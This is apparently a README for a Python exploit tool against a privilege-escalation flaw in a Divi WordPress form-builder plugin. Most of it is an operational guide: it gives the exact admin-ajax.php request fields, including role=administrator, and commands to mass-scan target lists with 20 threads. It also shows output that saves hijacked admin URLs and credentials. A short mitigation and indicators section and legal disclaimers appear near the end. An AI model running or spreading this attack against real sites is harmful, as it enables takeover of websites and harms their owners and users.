Share
## https://sploitus.com/exploit?id=7D58C95C-E939-5B0B-A771-347518E2147A
# Divi Form Builder  **⚠️ WARNING: This tool is for authorized penetration testing and security research only.**  
> Unauthorized access to computer systems is illegal. Use only on systems you own or have explicit written permission to test.
> More Disclaimer You can see the disclaimer on the cover of Jenderal92. You can check it [HERE !!!](https://github.com/Jenderal92/)


## Overview

This Python 2 script exploits a privilege escalation vulnerability in the **Divi WordPress plugin** (and related Divi forms). It allows remote registration of an **administrator** account by:

- Extracting the `fb_nonce` from the target's Divi registration form.
- Sending a crafted multipart request to `/wp-admin/admin-ajax.php` with `role=administrator`.
- Automatically detecting success and saving compromised admin URLs.

## Features

- ✅ **Multi‑threaded** (default 20 threads) for fast scanning.
- ✅ **Automatic URL normalisation** – adds `https://` if missing.
- ✅ **Nonce extraction** using multiple regex patterns (inline JavaScript, hidden inputs, `de_fb_obj`).
- ✅ **Multipart/form-data** request that mimics a legitimate browser submission.
- ✅ **Success detection** via response keywords (`success`, `user_id`, `user created`, etc.).
- ✅ **Results saved** to `results.txt` in the format:  
  `https://target.com/wp-admin/ | username | password`

## Requirements

- **Python 2.7** (uses `urllib2`, `Queue`, `threading` – not compatible with Python 3 without modifications)
- A list of target URLs (one per line)

## Installation

```bash
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py
```

## Usage

### 1. Prepare target list

Create a text file with one domain or URL per line. You can omit `http://` / `https://` – the script will add `https://` by default.

**Example `targets.txt`:**
```
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org
```

### 2. Run the exploit

```bash
python CVE-2026-5118.py targets.txt
```

### 3. Output example

```
[*] Total targets : 4
[*] Credentials   : Attacker / Attacker@123#+
[*] Threads       : 20
[*] Output file   : results.txt

[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/

[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/

[3] Checking http://192.168.1.100/wordpress
[3] FAILED  http://192.168.1.100/wordpress

[4] Checking https://test-site.org
[4] FAILED  https://test-site.org

=== DONE ===
Successful: 2 / 4
```

### 4. Results file (`results.txt`)

```
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+
```

## Configuration

You can customise the following variables at the top of the script:

| Variable | Default | Description |
|----------|---------|-------------|
| `DEFAULT_USERNAME` | `Attacker` | Username to register |
| `DEFAULT_PASSWORD` | `Attacker@123#+` | Password (strong with special characters) |
| `DEFAULT_EMAIL` | `mail@admin.com` | Email address |
| `THREAD_COUNT` | `20` | Number of concurrent threads |
| `OUTPUT_FILE` | `results.txt` | File to save successful targets |

## How It Works

1. **Normalise URL** – adds `https://` if no scheme is provided.
2. **Extract nonce** – fetches the homepage (or registration page) and searches for `fb_nonce` using regex patterns.
3. **Build request** – constructs a `multipart/form-data` POST containing:
   - `action=de_fb_ajax_submit_ajax_handler`
   - `fb_nonce=`
   - `role=administrator`
   - `de_fb_user_login` / `user_login`
   - `de_fb_user_pass` / `user_pass`
   - `de_fb_user_email` / `user_email`
4. **Send to admin‑ajax.php** – if the response contains any success keywords, the target is marked as vulnerable.
5. **Save result** – writes the admin URL and credentials to the output file.

## Detection & Mitigation

**For WordPress administrators using Divi:**

- Update Divi and all associated plugins to the latest version.
- Disable public registration if not needed.
- Use a security plugin (Wordfence, Sucuri) to monitor `admin-ajax.php` requests.
- Implement reCAPTCHA on all registration forms.
- Never expose registration forms with a `role` parameter that can be manipulated.

**Indicators of compromise (IOCs):**

- Unexpected `admin-ajax.php` requests with `action=de_fb_ajax_submit_ajax_handler`
- New administrator users with suspicious usernames (e.g. `Attacker`)
- POST data containing `role=administrator` in access logs

## Legal Disclaimer

This software is provided for **educational purposes** and **authorised security testing only**. The author assumes no liability for misuse or damage caused by this tool. By using this software, you agree to:

- Obtain **written permission** from the system owner before testing.
- Comply with all applicable laws (CFAA, Computer Misuse Act, UU ITE, etc.).
- Immediately delete any unauthorised access obtained.
- Report vulnerabilities responsibly to the affected vendor.

**Violating these terms may result in criminal prosecution, fines, or imprisonment.**

## Contributing

Pull requests are welcome for improvements (Python 3 port, better nonce extraction, additional registration path detection). Please maintain the ethical disclaimer.